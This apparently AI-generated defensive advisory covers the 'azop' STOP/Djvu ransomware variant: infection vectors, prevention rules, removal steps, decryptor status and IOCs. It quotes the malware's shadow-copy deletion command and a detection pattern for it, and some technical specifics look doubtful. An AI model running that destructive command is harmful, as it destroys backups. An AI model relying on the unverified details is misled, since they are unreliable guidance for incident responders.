azop

[Content by Gemini 2.5]

azop Ransomware Community Resource
Prepared by: Cybersecurity Ransomware Response Team
Last Revision: 2023-11-16

TECHNICAL BREAKDOWN

  1. File Extension & Renaming Patterns
    • Extension: “.azop” (always lowercase, 4-char suffix appended to every encrypted file).
    • Renaming Convention:
    – Original file “MonthlyReport.xlsx” becomes “MonthlyReport.xlsx.azop”.
    – Directory dropped ransom note is “readme.txt” (2 variants named identically at root and inside each sub-folder).
    – In some campaigns the base filename is upper-cased (“MONTHLY    REPORT.XLSX.AZOP”), but the extension itself remains “.azop”.

  2. Detection & Outbreak Timeline
    • First Submission to VirusTotal: 2023-05-08 (VT hash 8adf7a9…).
    • Major SMTP spam waves:
    – 2023-05-12 → 25 K mails (spoofed QuickBooks/USPS invoices).
    – 2023-07-03 → Grand-Crab-style cracked software torrent droppers.
    • Confirmed active thru at least 2023-08 as tracked by ID-Ransomware uploads.

  3. Primary Attack Vectors
    A. Phishing Email with Double-extension .PDF.JS / .IMG.JS attachments.
    B. Software-keygen & KMS “crack” bundles on torrent sites (dropper “Setup.exe”).
    C. Exploitation of weak RDP (Port 3389/TCP) credentials (dictionary, password-spray).
    D. Supply-chain MSI trojanising via compromised shareware mirrors.
    E. Post-exploitation abuse of lolBins (PowerShell, WMIC, BitsAdmin) to disable Defender.

    Notable Tools Bundled (before encryption phase):
    • Mimikatz (LSASS dump)
    • Impacket-psexec (lateral movement)
    • LAN/WiFi Password Recovery (.NET stealer)

REMEDIATION & RECOVERY STRATEGIES

  1. Prevention
    • Kill-Chain Break Points
    – Domain-wide disabling of VBS/JS default file-type associations via GPO.
    – Block executable archives via mail-flow rule: *.IMG, *.IMG*.zip attachment.
    – MFA on all external RDP; restrict inbound 3389 to VPN ranges only.
    – Routine patching specifically for:
    * Windows Server 2008-2022 (disable outdated SMBv1)
    * Browser & PDF reader zero-days.
    • Immutable and air-gapped backups (Veeam hardened repositories or cloud immutability ≥ 30 days).
    • Sentinel-style monitoring: EDR rule “process creation where command-line contains ‘wmic shadowcopy delete’”.

  2. Removal
    Standard Safe-Boot Removal (Windows 10/11):
    1) Disconnect Ethernet/Wi-Fi → prevent additional exfil.
    2) Boot into Safe-Mode with Networking.
    3) Run Malwarebytes AdwCleaner or Sophos HitmanPro → quarantine Azop dropper (typical location “C:\ProgramData\RANDOM\xyz.exe”).
    4) Delete scheduled task “Windows Update Svc” (run schtasks /delete /tn "Windows Update Svc" /f).
    5) Remove registry autorun:
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper
    6) Reboot → run a second AV scan (Kaspersky Rescue Disk from USB) to ensure rootkit is gone.
    7) Restore legitimate Windows services disabled by Azop (sc config schedule start= auto, etc.).

  3. File Decryption & Recovery
    • AES-256 + RSA-2048 hybrid encryption (offline keys in early build; online keys in > 2023-06).
    • Current Status:
    – Free Decryptor: Available from Emsisoft 2023-09-11 (works ONLY for offline key victims i.e., when PC never reached C2).
    – Determination: Run “STOP Djvu Decryptor” → if tool shows “Your personal ID ends in ‘t1’ – offline key”, proceed.
    – Otherwise: no private key has been released; best avenue = offline backups or negotiated recovery (criminal demand $490–$980 depending on campaign).
    • Essential Tools/Patches:
    – Emsisoft Decryptor (source: https://emsisoft.com/ransomware-decryption-tools/stop-djvu)
    – Microsoft KB5026372 (May 2023) + Defender 1.397.547 signatures.
    – Qualys/WIZ vulnerability scanner for RDP brute-force audit.

  4. Other Critical Information
    • Azop is considered the 180th variant of the STOP (Djvu) ransomware family, sharing 95 % of code with Djvu strains “Zpps” and “Mztu”.
    • Malware installs the “.AzopFile” file-type handler so double-clicking an encrypted file opens Tor browser directly to the payment portal (hurried victims may pay).
    • Ransom note contains unique personal ID + victim ID → collect these before formatting the machine; they are required by the Emsisoft decryptor.
    • Before encryption, Azop uploads a snapshot of recent files to several MegaShare links (exfil marker seen “!!completeUpload.txt”). This means data-leak extortion is possible even after files are decrypted; notify compliance teams (GDPR, HIPAA) accordingly.
    • Shadow-copy deletion routine uses vssadmin delete shadows /all /quiet and then overwrites free-space with 0xCC pattern → reduces chance of volume shadow recovery.

Quick-Reference IOCs

SHA-256 (Dropper): ffb1c6771a9ab624c6e5c55a105c4e5e0cf7e3b711578a337615a7fa65c5e4f8
C2 Domains: bdnjqwerr1232.biz, azoprestore[.]com (via Tor hidden service mirror)
Registry Run Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper → “C:\ProgramData\RANDOM\winserv.exe”

Stay safe, stay patched, and share responsibly.